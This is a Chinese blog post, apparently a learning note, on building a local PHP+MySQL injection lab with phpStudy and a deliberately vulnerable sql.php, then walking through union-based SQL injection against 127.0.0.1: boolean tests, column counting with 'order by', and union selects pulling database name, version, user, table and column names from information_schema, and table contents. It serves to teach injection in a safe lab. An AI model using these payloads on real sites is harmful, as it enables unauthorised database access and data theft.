php mysql注入测试工具_php+mysql注入环境搭建及测试(上)

最近在观看小迪的第十三期视频,从里面学到了很多有关渗透方面的知识,弄懂了一些基础的mysql注入原理。同时记录下学习渗透的一些方法。

php+mysql注入环境搭建需要资料如下:

链接:http://pan.baidu.com/s/1kV746Dx 密码:026d

1.安装phpmystudy

自定义安装好phpmystudy,启动(运行phpmystudy)

2.编程一个注入页面(下载好的sql.php)

在phpmystudy安装路径下WWW目录创建一下文件夹test,

然后把下载好的sql.php复制一份到test下。

3.数据接受(创建数据库,注入传递参数到数据库)

http://127.0.0.1/phpmyadmin/           用户名密码都是root

创建一个表列数据,接受传递参数查询数据库。(我这里直接下数据库test下,创建一张biao表)

CREATE TABLE IF NOT EXISTS `biao` (  `id` int(10) NOT NULL,  `title` varchar(1000) NOT NULL,  `text` varchar(1000) NOT NULL) ENGINE=MyISAM DEFAULT CHARSET=GBK;

INSERT INTO `biao` (`id`, `title`, `text`) VALUES(1,'渗透注入','本地搭建注入环境')

032fce9eca01de36dfda8edfcf5e2c3d.png

cb627e4f8e12c349c819944d8dd425a2.png

好了,到此php+mysql注入环境搭建完成。

测试:

传递的参数?i=1

http://127.0.0.1/test/sql.php?i=1

195550e9226dfd92cbfca201fe62c6cf.png

检测是否有注入 :and 1=1正常 and 1=2不正常

934b853f95369ba35efba42eb1ed5a27.png

424be09534a0ddc7432a41ee53a051c9.png

猜解字段数:http://127.0.0.1/test/sql.php?i=1 and  1=1  order by 3  (3正常,4不正常,字段数为3)

a6706ea7bb5add6a41dc6146d484737a.png

猜解数据库名:http://127.0.0.1/test/sql.php?i=1 and 1=1  union select 1,2,3

d127d0da33f7e0033301b32e7ef4ae6e.png

获取数据库信息:

数据库名 database()

数据库版本 version()

数据库用户 user()操作系统 @@version_compile_os

http://127.0.0.1/test/sql.php?i=1 and 1=1  union select database(),version(),user()

99012cabb5a9bf59fba2c34ff703c0de.png

得到数据库为test,用户为root,数据库版本5.5.47

查询test(使用小葵多功能转换工具得到hex编码)下的表名信息:

http://127.0.0.1/test/sql.php?i=1 and 1=1  union select table_name,2,3 from information_schema.tables where table_schema=0x74657374

ce5eaa278b307c183b72b46ae83b36b8.png

查询biao(使用小葵多功能转换工具得到hex编码)下的列名信息:

http://127.0.0.1/test/sql.php?i=1 and 1=1  union select column_name,2,3 from information_schema.columns where table_name=0x6269616F

6a30737ecf222baafaa1e881ba3ba666.png

591dc66b33dfeaa121c71131bf48abc8.png

直接获取biao表名下的title列名的数据:

http://127.0.0.1/test/sql.php?i=1 and 1=1  union select title,2,3 from test.biao

64eceb96f87d166c2ccb2367bbd2cde3.png

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值